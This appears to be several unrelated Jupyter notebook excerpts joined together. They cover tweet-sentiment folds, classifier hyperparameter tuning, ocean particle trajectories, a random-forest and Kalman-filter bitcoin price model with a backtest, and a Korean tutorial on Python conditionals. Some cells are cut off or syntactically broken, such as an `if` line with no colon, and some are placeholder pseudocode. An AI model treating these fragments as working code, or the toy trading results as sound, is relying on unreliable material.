display(k_fold[['text', 'selected_text', 'sentiment', 'text_tokenCnt',
'selected_text_tokenCnt', 'jaccard', 'jaccard_mean'] + [c for c in k_fold.columns if (c.startswith('prediction_fold'))]].head(15))
###Output
_____no_output_____ |
black_box_optimization/Ensemble_Methods .ipynb | ###Markdown
Using a Decision Tree Classifier
###Code
def func(x,y):
estimator = DecisionTreeClassifier(max_depth= int(np.round(x)))
clf = BaggingClassifier(base_estimator=estimator, n_estimators= int(np.round(y)))
clf = clf.fit(x_train, y_train)
yhat = clf.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
return acc
xmin = 1
xmax = 50
ymin = 1
ymax = 50
pbounds = {'x': (xmin, xmax), 'y': (ymin, ymax)}
optimizer = BayesianOptimization(f=func, pbounds=pbounds, verbose=3)
optimizer.maximize(init_points = 20, n_iter = 30)
best_params = optimizer.max["params"]
found_x = best_params['x']
found_y = best_params['y']
max_value = func(found_x, found_y)
print("Found x: {}, f: {}".format(found_x, (func(found_x, found_y))))
print("Found y: {}, f: {}".format(found_y, (func(found_x, found_y))))
print("Max value found is: {}".format(max_value))
estimator = DecisionTreeClassifier(max_depth=int(np.round(found_x)))
clf = BaggingClassifier(base_estimator=estimator, n_estimators= int(np.round(found_y)))
clf = clf.fit(x_train, y_train)
yhat = clf.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
acc
x = np.array([1,0,0.4,0]).reshape(1,-1)
x
a = clf.predict(x)
category = int(a[0])
if category == 1
###Output
_____no_output_____
###Markdown
Using a Random Forest Classifier
###Code
def func(x,y):
rfr = RandomForestClassifier(max_depth = int(np.round(x)), n_estimators = int(np.round(y)), max_features = 4)
rfr = rfr.fit(x_train, y_train.flatten())
yhat = rfr.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
return acc
from bayes_opt import BayesianOptimization
xmin = 1
xmax = 100
ymin = 1
ymax = 100
pbounds = {'x': (xmin, xmax), 'y': (ymin, ymax)}
optimizer = BayesianOptimization(f=func, pbounds=pbounds, verbose=4)
optimizer.maximize(init_points = 20, n_iter = 30)
best_params = optimizer.max["params"]
found_x = best_params['x']
found_y = best_params['y']
max_value = func(found_x, found_y)
print("Found x: {}, f: {}".format(found_x, (func(found_x, found_y))))
print("Found y: {}, f: {}".format(found_y, (func(found_x, found_y))))
print("Max value found is: {}".format(max_value))
rfr = RandomForestClassifier(max_depth = int(np.round(found_x)), n_estimators = int(np.round(found_y)), max_features = 4)
rfr = rfr.fit(x_train, y_train.flatten())
yhat = rfr.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
acc
###Output
_____no_output_____
###Markdown
Using a Gradient Boosting Classifier def func(x,y): gbr = GradientBoostingClassifier(n_estimators = int(np.round(x)), max_depth = int(np.round(y)), learning_rate = 0.1) gbr = gbr.fit(x_train, y_train.flatten()) yhat = gbr.predict(x_test) MSE = mean_squared_error(y_test, yhat) acc = accuracy_score(y_test, yhat) return accxmin = 1xmax = 50ymin = 1ymax = 50pbounds = {'x': (xmin, xmax), 'y': (ymin, ymax)}optimizer = BayesianOptimization(f=func, pbounds=pbounds, verbose=3)optimizer.maximize(init_points = 20, n_iter = 30) best_params = optimizer.max["params"] found_x = best_params['x']found_y = best_params['y']max_value = func(found_x, found_y) print("Found x: {}, f: {}".format(found_x, (func(found_x, found_y))))print("Found y: {}, f: {}".format(found_y, (func(found_x, found_y))))print("Max value found is: {}".format(max_value)) gbr = GradientBoostingClassifier(n_estimators = int(np.round(found_x)), max_depth = int(np.round(found_y)), learning_rate = 0.1)gbr = gbr.fit(x_train, y_train.flatten())yhat = gbr.predict(x_test)MSE = mean_squared_error(y_test, yhat)acc = accuracy_score(y_test, yhat) Visualizing the Data This code will run the predictions from the Ensemble method to generate predictions based on the number of trials, accuracy, and time of iteration
###Code
def generate_data(b):
n = 11 #Number of points per dimension. Number of trials = n^3
prediction_list = []
prediction_parameters = []
for k in range(n):
for j in range(n):
for i in range(n):
a = k/(n-1)
c = j/(n-1)
d = i/(n-1)
predict_array = np.array([a,b,c,d]).reshape(1,-1)
prediction = clf.predict(predict_array)
prediction_parameters.append([a,c,d])
prediction_list.append(prediction)
p_class = np.asarray(prediction_list)
p_parameters = np.asarray(prediction_parameters)
data = np.hstack((p_parameters, p_class))
return data
def plot_data(data, view_angle_h, view_angle_v):
cols = ['Trials', 'Accuracy', 'Time', 'Class']
df = pd.DataFrame(data, columns = cols)
class_0_data = np.asarray(df[df['Class'] == 0.])
class_1_data = np.asarray(df[df['Class'] == 1.])
class_2_data = np.asarray(df[df['Class'] == 2.])
class_3_data = np.asarray(df[df['Class'] == 3.])
plt.close()
fig = plt.subplots(figsize=(15,10))
ax = plt.axes(projection='3d')
xline_0 = class_0_data[:,0]
yline_0 = class_0_data[:,1]
zline_0 = class_0_data[:,2]
ax.scatter3D(xline_0, yline_0, zline_0, color = 'b', marker='o', s=300, alpha = 0.25, label = 'CmaEs')
xline_1 = class_1_data[:,0]
yline_1 = class_1_data[:,1]
zline_1 = class_1_data[:,2]
ax.scatter3D(xline_1, yline_1, zline_1, color = 'y', marker='o', s=300, alpha = 0.25, label = 'Random')
xline_2 = class_2_data[:,0]
yline_2 = class_2_data[:,1]
zline_2 = class_2_data[:,2]
ax.scatter3D(xline_2, yline_2, zline_2, color = 'g', marker='o', s =300, alpha = 0.25, label = 'TPE')
xline_3 = class_3_data[:,0]
yline_3 = class_3_data[:,1]
zline_3 = class_3_data[:,2]
ax.scatter3D(xline_3, yline_3, zline_3, color = 'r', marker='o', s=300, alpha = 0.25, label = 'Bayes')
plt.legend(loc = 'upper right')
ax.set_xlabel('Number of Trials')
ax.set_ylabel('Accuracy')
ax.set_zlabel('Time per Iteration')
ax.view_init(elev= view_angle_v, azim=view_angle_h)
plt.show()
data_0 = generate_data(0)
data_1 = generate_data(1)
%matplotlib inline
def update(Rotate_View_h=0, Rotate_View_v=0, N_of_Params=0):
if N_of_Params == 0:
plot_data(data_0, Rotate_View_h, Rotate_View_v)
else:
plot_data(data_1, Rotate_View_h, Rotate_View_v)
interact(update, Rotate_View_h = (40,360,20), Rotate_View_v = (10,360,20), N_of_Params = (0,1,1))
###Output
_____no_output_____
###Markdown
Importing from python file
###Code
from ensemble_methods import decision_tree_classifier
decision_tree_classifier(1,1,1,1)
###Output
| iter | target | x | y |
-------------------------------------------------
| [0m 1 [0m | [0m 0.6373 [0m | [0m 38.72 [0m | [0m 20.01 [0m |
| [0m 2 [0m | [0m 0.6373 [0m | [0m 12.35 [0m | [0m 19.79 [0m |
| [95m 3 [0m | [95m 0.6453 [0m | [95m 20.32 [0m | [95m 41.13 [0m |
| [0m 4 [0m | [0m 0.6373 [0m | [0m 15.39 [0m | [0m 15.38 [0m |
| [0m 5 [0m | [0m 0.584 [0m | [0m 5.209 [0m | [0m 12.31 [0m |
| [0m 6 [0m | [0m 0.64 [0m | [0m 36.58 [0m | [0m 12.46 [0m |
| [95m 7 [0m | [95m 0.648 [0m | [95m 27.65 [0m | [95m 46.55 [0m |
| [0m 8 [0m | [0m 0.6267 [0m | [0m 17.44 [0m | [0m 12.37 [0m |
| [0m 9 [0m | [0m 0.6427 [0m | [0m 29.87 [0m | [0m 13.75 [0m |
| [95m 10 [0m | [95m 0.6533 [0m | [95m 43.78 [0m | [95m 39.97 [0m |
| [0m 11 [0m | [0m 0.64 [0m | [0m 27.19 [0m | [0m 32.74 [0m |
| [0m 12 [0m | [0m 0.648 [0m | [0m 48.29 [0m | [0m 40.94 [0m |
| [0m 13 [0m | [0m 0.6453 [0m | [0m 35.69 [0m | [0m 28.48 [0m |
| [0m 14 [0m | [0m 0.6373 [0m | [0m 30.0 [0m | [0m 22.34 [0m |
| [0m 15 [0m | [0m 0.5893 [0m | [0m 27.73 [0m | [0m 2.305 [0m |
| [0m 16 [0m | [0m 0.6427 [0m | [0m 48.44 [0m | [0m 32.52 [0m |
| [95m 17 [0m | [95m 0.656 [0m | [95m 23.12 [0m | [95m 33.67 [0m |
| [0m 18 [0m | [0m 0.6453 [0m | [0m 35.38 [0m | [0m 26.8 [0m |
| [0m 19 [0m | [0m 0.6267 [0m | [0m 25.33 [0m | [0m 5.286 [0m |
| [95m 20 [0m | [95m 0.6613 [0m | [95m 17.5 [0m | [95m 4.131 [0m |
| [0m 21 [0m | [0m 0.5947 [0m | [0m 14.45 [0m | [0m 1.0 [0m |
| [0m 22 [0m | [0m 0.6213 [0m | [0m 19.14 [0m | [0m 5.285 [0m |
| [0m 23 [0m | [0m 0.632 [0m | [0m 17.71 [0m | [0m 3.731 [0m |
| [0m 24 [0m | [0m 0.648 [0m | [0m 12.36 [0m | [0m 19.77 [0m |
| [0m 25 [0m | [0m 0.6507 [0m | [0m 12.06 [0m | [0m 40.35 [0m |
| [0m 26 [0m | [0m 0.6533 [0m | [0m 12.33 [0m | [0m 19.75 [0m |
| [0m 27 [0m | [0m 0.624 [0m | [0m 42.42 [0m | [0m 3.057 [0m |
| [0m 28 [0m | [0m 0.6427 [0m | [0m 31.76 [0m | [0m 23.56 [0m |
| [0m 29 [0m | [0m 0.6453 [0m | [0m 23.03 [0m | [0m 33.64 [0m |
| [0m 30 [0m | [0m 0.656 [0m | [0m 34.61 [0m | [0m 12.4 [0m |
| [0m 31 [0m | [0m 0.632 [0m | [0m 34.57 [0m | [0m 12.28 [0m |
| [0m 32 [0m | [0m 0.5893 [0m | [0m 2.784 [0m | [0m 29.29 [0m |
| [0m 33 [0m | [0m 0.632 [0m | [0m 35.28 [0m | [0m 26.92 [0m |
| [0m 34 [0m | [0m 0.6427 [0m | [0m 12.01 [0m | [0m 40.24 [0m |
| [0m 35 [0m | [0m 0.6533 [0m | [0m 12.29 [0m | [0m 19.63 [0m |
| [95m 36 [0m | [95m 0.6667 [0m | [95m 11.9 [0m | [95m 40.36 [0m |
| [0m 37 [0m | [0m 0.6267 [0m | [0m 28.26 [0m | [0m 37.71 [0m |
| [0m 38 [0m | [0m 0.6533 [0m | [0m 35.36 [0m | [0m 35.97 [0m |
| [0m 39 [0m | [0m 0.6533 [0m | [0m 9.661 [0m | [0m 20.17 [0m |
| [0m 40 [0m | [0m 0.6373 [0m | [0m 36.9 [0m | [0m 46.55 [0m |
| [95m 41 [0m | [95m 0.6747 [0m | [95m 9.579 [0m | [95m 20.27 [0m |
| [0m 42 [0m | [0m 0.6453 [0m | [0m 8.518 [0m | [0m 22.51 [0m |
| [0m 43 [0m | [0m 0.656 [0m | [0m 12.4 [0m | [0m 19.68 [0m |
| [0m 44 [0m | [0m 0.6267 [0m | [0m 17.64 [0m | [0m 4.263 [0m |
| [0m 45 [0m | [0m 0.6453 [0m | [0m 37.32 [0m | [0m 35.87 [0m |
| [0m 46 [0m | [0m 0.6347 [0m | [0m 9.737 [0m | [0m 20.28 [0m |
| [0m 47 [0m | [0m 0.648 [0m | [0m 21.03 [0m | [0m 35.33 [0m |
| [0m 48 [0m | [0m 0.6507 [0m | [0m 23.16 [0m | [0m 33.76 [0m |
| [0m 49 [0m | [0m 0.544 [0m | [0m 2.173 [0m | [0m 10.88 [0m |
| [0m 50 [0m | [0m 0.5787 [0m | [0m 4.754 [0m | [0m 2.528 [0m |
=================================================
Found x: 9.579322837783078, f: 0.6533333333333333
Found y: 20.265925909485215, f: 0.6533333333333333
Max value found is: 0.656
|
scripts/analysis/Parcels_analysis_4km_bwd.ipynb | ###Markdown
old
###Code
#find which particles arrived at the Galapagos islands
Traj['traveltime'] = [] #age at arrival
Traj['visittime'] = [] #date of arrival
Traj['pvisited'] = [] #index particle
Traj['tvisited'] = [] #index time
for p in range(Traj['visitedgalapagos'].shape[0]): # loop through particles
if np.any(Traj['visitedgalapagos'][p, :] == 1): # check whether visited Galapagos
I = np.where(Traj['visitedgalapagos'][p, :] == 1)[0][0] # find first index when
Traj['traveltime'].append(Traj['age'][p, I]/86400.)
Traj['visittime'].append(Traj['time'][p,I])
Traj['pvisited'].append(p)
Traj['tvisited'].append(I)
#individual trajectories that reach Galapagos extent
plat = Traj['lat'][Traj['pvisited'],:]
plon = Traj['lon'][Traj['pvisited'],:]
map_extent = [-180,-70,-30,30]
PlotTrajectories(plon,plat,map_extent)
plt.savefig('../results/figures/TrajAmerica')
#2D histogram from start to arrival
projection = cartopy.crs.PlateCarree(central_longitude=0)
fig, ax = plt.subplots(subplot_kw={'projection': projection}, figsize=(7,7))
grd = ax.gridlines(draw_labels=True,
color='gray',
alpha=0.5,
linestyle='--')
grd.xlabels_top = False
grd.ylabels_right = False
grd.xlabel_style = {'size': 15, 'color': 'black'}
grd.ylabel_style = {'size': 15, 'color': 'black'}
ax.coastlines()
ax.add_feature(cartopy.feature.LAND, facecolor=(160/255, 160/255, 160/255))
ax.set_extent([-130,-60,-25,30])
bins = [np.arange(-130,-60, 1), np.arange(-25, 30, 1)]
temp = Traj['lon'][Traj['pvisited'],:]
plon = np.copy(temp)
temp = Traj['lat'][Traj['pvisited'],:]
plat = np.copy(temp)
for i, t in enumerate(Traj['tvisited']):
plon[i,t:] = nan
plat[i,t:] = nan
H, xe, ye = np.histogram2d(plon[~np.isnan(plon)], plat[~np.isnan(plat)], bins=bins)
H[0,: ] = H[-1, :]
xb = (xe[1:] + xe[:-1])/2
yb = (ye[1:] + ye[:-1])/2
levels = [10**x for x in range(0, 9)]
co = ax.contourf(xb, yb, H.T, levels=levels, norm=colors.LogNorm())
###Output
_____no_output_____
###Markdown
Practice plotting Subplots
###Code
%matplotlib inline
T = D['bwd_v2']
plat = T['lat']
plon = T['lon']
ptime = T['time']
projection = cartopy.crs.PlateCarree(central_longitude=0)
fig, ax = plt.subplots(1, 2, subplot_kw={'projection': projection}, figsize=(15,15))
for i in range (len(ax)):
grd = ax[i].gridlines(draw_labels=True,
color='gray',
alpha=0.5,
linestyle='--')
grd.xlabels_top = False
grd.ylabels_right = False
if i==1:
grd.ylabels_left = False
grd.xlabel_style = {'size': 15, 'color': 'black'}
grd.ylabel_style = {'size': 15, 'color': 'black'}
ax[i].coastlines()
ax[i].add_feature(cartopy.feature.LAND, facecolor=(160/255, 160/255, 160/255))
ax[i].set_extent([-110, -70, -20, 30])
particles = np.arange(1,300)
for particle in particles:
ax[0].plot(plon[particle,:], plat[particle,:],
linewidth=1,
color='r')
particles = np.arange(40000,40200)
for particle in particles:
ax[1].plot(plon[particle,:],plat[particle,:])
#plt.show()
###Output
_____no_output_____ |
DataScience_FinalProject/Random Forrest & Kalman Filter.ipynb | ###Markdown
Random Forrest Framework
###Code
class RandomForest():
def __init__(self, x, y, n_trees, n_features, sample_sz, depth=10, min_leaf=5):
np.random.seed(12)
if n_features == 'sqrt':
self.n_features = int(np.sqrt(x.shape[1]))
elif n_features == 'log2':
self.n_features = int(np.log2(x.shape[1]))
else:
self.n_features = n_features
# print(self.n_features, "sha: ",x.shape[1])
self.x, self.y, self.sample_sz, self.depth, self.min_leaf = x, y, sample_sz, depth, min_leaf
self.trees = [self.create_tree() for i in range(n_trees)]
def create_tree(self):
idxs = np.random.permutation(len(self.y))[:self.sample_sz]
f_idxs = np.random.permutation(self.x.shape[1])[:self.n_features]
return DecisionTree(self.x.iloc[idxs], self.y[idxs], self.n_features, f_idxs,
idxs=np.array(range(self.sample_sz)),depth = self.depth, min_leaf=self.min_leaf)
def predict(self, x):
return np.mean([t.predict(x) for t in self.trees], axis=0)
def std_agg(cnt, s1, s2): return math.sqrt((s2/cnt) - (s1/cnt)**2)
class DecisionTree():
def __init__(self, x, y, n_features, f_idxs,idxs,depth=10, min_leaf=5):
self.x, self.y, self.idxs, self.min_leaf, self.f_idxs = x, y, idxs, min_leaf, f_idxs
self.depth = depth
# print(f_idxs)
# print(self.depth)
self.n_features = n_features
self.n, self.c = len(idxs), x.shape[1]
self.val = np.mean(y[idxs])
self.score = float('inf')
self.find_varsplit()
def find_varsplit(self):
for i in self.f_idxs: self.find_better_split(i)
if self.is_leaf: return
x = self.split_col
lhs = np.nonzero(x<=self.split)[0]
rhs = np.nonzero(x>self.split)[0]
lf_idxs = np.random.permutation(self.x.shape[1])[:self.n_features]
rf_idxs = np.random.permutation(self.x.shape[1])[:self.n_features]
self.lhs = DecisionTree(self.x, self.y, self.n_features, lf_idxs, self.idxs[lhs], depth=self.depth-1, min_leaf=self.min_leaf)
self.rhs = DecisionTree(self.x, self.y, self.n_features, rf_idxs, self.idxs[rhs], depth=self.depth-1, min_leaf=self.min_leaf)
def find_better_split(self, var_idx):
x, y = self.x.values[self.idxs,var_idx], self.y[self.idxs]
sort_idx = np.argsort(x)
sort_y,sort_x = y[sort_idx], x[sort_idx]
rhs_cnt,rhs_sum,rhs_sum2 = self.n, sort_y.sum(), (sort_y**2).sum()
lhs_cnt,lhs_sum,lhs_sum2 = 0,0.,0.
for i in range(0,self.n-self.min_leaf-1):
xi,yi = sort_x[i],sort_y[i]
lhs_cnt += 1; rhs_cnt -= 1
lhs_sum += yi; rhs_sum -= yi
lhs_sum2 += yi**2; rhs_sum2 -= yi**2
if i<self.min_leaf or xi==sort_x[i+1]:
continue
lhs_std = std_agg(lhs_cnt, lhs_sum, lhs_sum2)
rhs_std = std_agg(rhs_cnt, rhs_sum, rhs_sum2)
curr_score = lhs_std*lhs_cnt + rhs_std*rhs_cnt
if curr_score<self.score:
self.var_idx,self.score,self.split = var_idx,curr_score,xi
@property
def split_name(self): return self.x.columns[self.var_idx]
@property
def split_col(self): return self.x.values[self.idxs,self.var_idx]
@property
def is_leaf(self): return self.score == float('inf') or self.depth <= 0
def predict(self, x):
return np.array([self.predict_row(xi) for xi in x])
def predict_row(self, xi):
if self.is_leaf: return self.val
t = self.lhs if xi[self.var_idx]<=self.split else self.rhs
return t.predict_row(xi)
import pandas as pd
from pandas import DatetimeIndex
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style='darkgrid', context='talk', palette='Dark2')
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
%matplotlib inline
import math
import seaborn as sns
sns.set(style='darkgrid', context='talk', palette='Dark2')
my_year_month_fmt = mdates.DateFormatter('%m/%y')
plt.rcParams['figure.figsize'] = (15, 9)
%matplotlib inline
bitcoin_df = pd.read_excel("CRYPTOCURRENCY/BITCOIN.xlsx")
nvdia_df = pd.read_excel("CRYPTOCURRENCY/NVDA.xlsx")
nvdia_df.head()
###Output
_____no_output_____
###Markdown
Create Date as index
###Code
bitcoin_df.index=DatetimeIndex(bitcoin_df['Date'])
nvdia_df.index=DatetimeIndex(nvdia_df['Date'])
###Output
_____no_output_____
###Markdown
Join NVD and Bitcoin datasets
###Code
X = bitcoin_df.join(nvdia_df,rsuffix='_nvida')
X["Bitcoin_Price"] = (2*bitcoin_df.High + bitcoin_df.Low + bitcoin_df.Close)/4
X.drop(columns=['Date', 'Open', 'High', 'Low', 'Close','Date_nvida', 'Open ', 'Close ', 'High ', 'Low ','Market Cap'],inplace=True)
X.columns = ['bitcoin_volume','nvd_volume','nvd_price','bitcoin_price']
X.drop(X[X.bitcoin_volume.isnull()].index,inplace=True)
X.drop(X[X.bitcoin_volume == '-'].index,inplace=True)
###Output
_____no_output_____
###Markdown
Since there are missing values weekends and holidays, I backfill for NVD values
###Code
X['nvd_price'].fillna(method='bfill',inplace=True)
X['nvd_volume'].fillna(method='bfill',inplace=True)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
ax1.plot(X.index,X['bitcoin_price'])
ax1.set_ylabel("Bitcoin Price")
ax2.plot(X.index,X['nvd_price'])
ax2.set_ylabel("Nvidia Price")
###Output
_____no_output_____
###Markdown
Set bitcoin price as the y
###Code
y = X.bitcoin_price
X.drop(['bitcoin_price'],inplace = True,axis=1)
###Output
_____no_output_____
###Markdown
Create Random Forrest Structure
###Code
rf = RandomForest(x=X,y=y,n_trees=20,n_features=4,sample_sz=500)
tree = rf.create_tree()
y_pred = rf.predict(X.tail(365).values)
###Output
_____no_output_____
###Markdown
Comparing predicted values for the last year and actual pricesThe prediction follows the trend similar to actual values
###Code
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
ax1.plot(X.tail(365).index,y_pred,label="Predicted bitcoin price in USD")
ax1.set_ylabel("Predictions")
ax2.set_ylabel("Actual")
ax1.legend(loc='best')
ax2.plot(X.tail(365).index,y.tail(365),label="Actual bitcoin prices")
ax2.legend(loc='best')
###Output
_____no_output_____
###Markdown
The daily data seems to be noise and has fluctuations, that's why tried a Moving average
###Code
ema_short = X.ewm(span=7, adjust=False).mean()
y_short = y.ewm(span=7, adjust=False).mean()
rf2 = RandomForest(x=ema_short,y=y_short,n_trees=20,n_features=4,sample_sz=500)
y_pred_short = rf.predict(ema_short.tail(365).values)
rf2.create_tree()
###Output
_____no_output_____
###Markdown
The flucutations are much less noise than daily predictions and seems more accurate
###Code
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
ax1.plot(ema_short.tail(365).index,y_pred_short,label="prediction")
ax2.plot(X.tail(365).index,y_short.tail(365),label="actual")
ax1.set_ylabel("Predictions")
ax2.set_ylabel("Actual")
ax1.legend(loc='best')
ax2.legend(loc='best')
trading_signal_week = pd.DataFrame(np.sign(np.diff(y_pred_short)),index=X.tail(364).index,columns=["signal"])
trading_signal_week.head()
trading_signal_week = trading_signal_week.shift(1)
fig, (ax2) = plt.subplots(1, 1, figsize=(16,9))
duration = 120
y_temp = pd.DataFrame(y_short.tail(duration),index =X.tail(duration).index)
ax2.plot(X.tail(duration).index,y.tail(duration),label="Bitcoin Price")
ax2.set_ylabel("Actual Price for last 30 days")
ax2.legend(loc='best')
# # Plot the buy signals
ax2.plot(trading_signal_week.tail(duration).loc[trading_signal_week.signal == 1.0].index,
y.tail(duration)[trading_signal_week.signal == 1.0],'^', markersize=10, color='m')
# Plot the sell signals
ax2.plot(trading_signal_week.tail(duration).loc[trading_signal_week.signal == -1.0].tail(duration).index,
y.tail(duration)[trading_signal_week.signal == -1.0],'v', markersize=10, color='r')
###Output
_____no_output_____
###Markdown
Backtest with initial capital of $10000
###Code
# Set the initial capital
initial_capital= float(10000.0)
# Create a DataFrame `positions`
positions = pd.DataFrame(index=trading_signal_week.index).fillna(0.0)
# Buy 100 coins
positions['bitcoin_price'] = 10*trading_signal_week['signal']
# Initialize the portfolio with value owned
portfolio = positions.multiply(y_short.tail(365), axis=0)
# Store the difference in shares owned
pos_diff = positions.diff()
# Add `holdings` to portfolio
portfolio['holdings'] = (positions.multiply(y_short.tail(365), axis=0)).sum(axis=1)
# Add `cash` to portfolio
portfolio['cash'] = initial_capital - (pos_diff.multiply(y_short.tail(365), axis=0)).sum(axis=1).cumsum()
# Add `total` to portfolio
portfolio['total'] = portfolio['cash'] + portfolio['holdings']
# Add `returns` to portfolio
portfolio['returns'] = portfolio['total'].pct_change()
portfolio = portfolio.loc["2017-09-16":]
fig, ax1 = plt.subplots(1, 1, figsize=(16,9))
duration = 120
ax1.plot(portfolio['total'])
###Output
_____no_output_____
###Markdown
Sharpe Ratio
###Code
# Isolate the returns of your strategy
returns = portfolio['returns']
# annualized Sharpe ratio
sharpe_ratio = np.sqrt(365) * (returns.mean() / returns.std())
# Print the Sharpe ratio
print(sharpe_ratio)
###Output
1.285548404196041
###Markdown
Maximum Drawdown
###Code
# Define a trailing 252 trading day window
window = 365
# Calculate the max drawdown in the past window days for each day
rolling_max = y_short.rolling(window, min_periods=1).max()
daily_drawdown =y_short/rolling_max - 1.0
# Calculate the minimum (negative) daily drawdown
max_daily_drawdown = daily_drawdown.rolling(window, min_periods=1).min()
# Plot the results
daily_drawdown.plot()
max_daily_drawdown.plot()
# Show the plot
plt.show()
###Output
_____no_output_____
###Markdown
Given the noise in the signal provided by Random Forrest, let's try using Kalman Filter to smooth things out K =1
###Code
Y = y_pred
_,_,k_value = KalmanFilter_main(Y,1)
###Output
Optimization terminated successfully.
Current function value: 3342.569807
Iterations: 216
Function evaluations: 379
T*u_smooth[-1] is -6731.038446064072; Z*u_tplus1 is 8061.573704184884
###Markdown
Plot actual vs Kalman PredictionsThe peaks seem to smoothened out
###Code
plt.rcParams['figure.figsize'] = (15, 9)
timevec = y.tail(365).index
fig = plt.plot(timevec, -k_value,'r',timevec, Y,'b:')
###Output
_____no_output_____
###Markdown
Comparing Actual Prices versus Kalman Smoothed Prices
###Code
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
#ax1.plot(ema_short.tail(365).index,y_pred_short,label="prediction")
ax1.plot(X.tail(365).index,y_short.tail(365),label="actual")
ax2.plot(X.tail(365).index,-k_value)
ax1.set_ylabel("Actual Prices")
ax2.set_ylabel("Kalman Prices")
ax1.legend(loc='best')
ax2.legend(loc='best')
###Output
No handles with labels found to put in legend.
###Markdown
Functions defined Below--
###Code
from scipy import optimize
def KalmanFilter(R,k,params):
S_length = R.shape[0]
S = S_length+1
if k == 1:
Z = np.array(2/(1+np.exp(-params[0]))-1)
H = np.array(np.exp(params[1]))
T = np.array(2/(1+np.exp(-params[2]))-1)
Q = np.array(np.exp(params[3]))
if k == 2:
Z = np.array([[2/(1+np.exp(-params[0]))-1,2/(1+np.exp(-params[1]))-1]])
H = np.array(np.exp(params[2]))
T = np.array([[2/(1+np.exp(-params[3]))-1,0],[0,2/(1+np.exp(-params[4]))-1]])
Q = np.array([[np.exp(params[5]),0],[0,np.exp(params[6])]])
u_predict = np.zeros((k,S));
u_update = np.zeros((k,S));
P_predict = np.zeros((k,k,S));
P_update = np.zeros((k,k,S));
v = np.zeros((1,S));
F = np.zeros((1,S));
KF_Dens = np.zeros((1,S));
for i in range(S):
if i == 0:
P_update[:,:,i] = 1000*np.eye(k)
P_predict[:,:,i] = T.dot(np.array(P_update[0][0][0]).dot(T.T))+Q
else:
F[0][i] = Z.dot(P_predict[:,:,i-1].dot(Z.T))+H
v[0][i] = R.T.flatten()[i-1]-Z.dot(u_predict[:,i-1])
u_update[:,i] = u_predict[:,i-1]+P_predict[:,:,i-1].dot(Z.T.dot(np.linalg.inv([[F[0][i]]]).dot(v[0][i]))).flatten()
u_predict[:,i] = T.dot(u_update[:,i])
P_update[:,:,i] = P_predict[:,:,i-1]-P_predict[:,:,i-1].dot(Z.T.dot(np.linalg.inv([[F[0][i]]]).dot(Z.dot(P_predict[:,:,i-1]))))
P_predict[:,:,i] = T.dot(P_update[:,:,i]).dot(T.T)+Q
KF_Dens[0][i] = (1.0/2)*np.log(2*np.pi)+(1.0/2)*np.log(np.abs(F[0][i]))+(1.0/2)+v[0][i].T*np.linalg.inv([[F[0][i]]])*v[0][i]
Likelihood = np.sum(KF_Dens)-KF_Dens[0][0]
varargout = [u_update, P_update, P_predict, T]
return Likelihood, varargout
def KalmanSmoother(R,k,params_star):
_,vararg = KalmanFilter(R,k,params_star)
u_update = vararg[0]
P_update = vararg[1]
P_predict = vararg[2]
T = np.array(vararg[3])
S = R.shape[0]+1
u_smooth = np.zeros((k,S))
P_smooth = np.zeros((k,k,S))
u_smooth[:,S-1] = u_update[:,S-1]
P_smooth[:,:,S-1] = P_update[:,:,S-1]
for t in reversed(range(1,S)): # 2 to S inverse sequence
u_smooth[:,t-1] = u_update[:,t] + P_update[:,:,t].dot(T.T.dot(np.linalg.inv(P_predict[:,:,t]).dot((u_smooth[:,t]-T.dot(u_update[:,t])))))
P_smooth[:,:,t-1] = P_update[:,:,t] + P_update[:,:,t].dot(T.T).dot(np.linalg.inv(P_predict[:,:,t])).dot((P_smooth[:,:,t]-P_predict[:,:,t])).dot(np.linalg.inv(P_predict[:,:,t])).dot(T).dot(P_update[:,:,t])
u_smooth = u_smooth.flatten()[1:]
return u_smooth
def KalmanFilter_main(R,k):
r = 0.25*np.log(np.var(R,axis = 0,ddof=1))
if k == 1:
param0 = np.append(np.append(np.append(np.array(100),r,),100),r)
if k == 2:
param0 = np.append(np.append(np.append(np.array([100,100]),4*r),[-100,-100]),[r,r])
def objective(params):
Likelihood,_ = KalmanFilter(R,k,params)
return Likelihood
params_star= optimize.fmin(objective,param0)
u_smooth = KalmanSmoother(R, k, params_star)
Z = 2/(1+np.exp(-params_star[0]))-1;
H = np.exp(params_star[1]);
T = 2/(1+np.exp(-params_star[2]))-1;
Q = np.exp(params_star[3]);
u_tplus1 = T*u_smooth[-1] + np.random.normal()*np.sqrt(Q)
price_tplus1 = Z*u_tplus1 + np.random.normal()*np.sqrt(H)
print('T*u_smooth[-1] is {}; Z*u_tplus1 is {}'.format(T*u_smooth[-1],Z*u_tplus1))
return price_tplus1,u_tplus1,u_smooth
###Output
_____no_output_____
###Markdown
For k=2, we use (Y-Ymean)/Ystd for normalizing values
###Code
Y_2=(y_pred-y_pred.mean())/y_pred.std()
_,_,k_value_2 = KalmanFilter_main(Y_2,2)
fig = plt.plot(np.linspace(1,365,365), k_value_2[366:],'r',np.linspace(1,365,365), Y_2,'b:')
###Output
_____no_output_____ |
python/practice/1-4_condition.ipynb | ###Markdown
조건문 만들기 비교연산자
###Code
a = 3
b = 5
a < b
c = 3
d = 3
c <= d
c != d
###Output
_____no_output_____
###Markdown
논리 연산자 : and / or / not and
###Code
True and True
True and False
###Output
_____no_output_____
###Markdown
or
###Code
True or True
True or False
False or False
###Output
_____no_output_____
###Markdown
not
###Code
not True
not False
###Output
_____no_output_____
###Markdown
in + 해당 자료형의 요소인지 파악하기 : in / not in
###Code
e = [1, 3, 5, 7]
0 in e
1 in e
2 not in e
3 not in e
###Output
_____no_output_____
###Markdown
if / else
###Code
if 조건 :
수행 할 문장1
수행 할 문장2
else :
수행 할 문장3
수행 할 문장4
money = True
if money :
print("여행을 간다")
else :
print("집에서 쉰다")
###Output
여행을 간다
###Markdown
if / elif / else
###Code
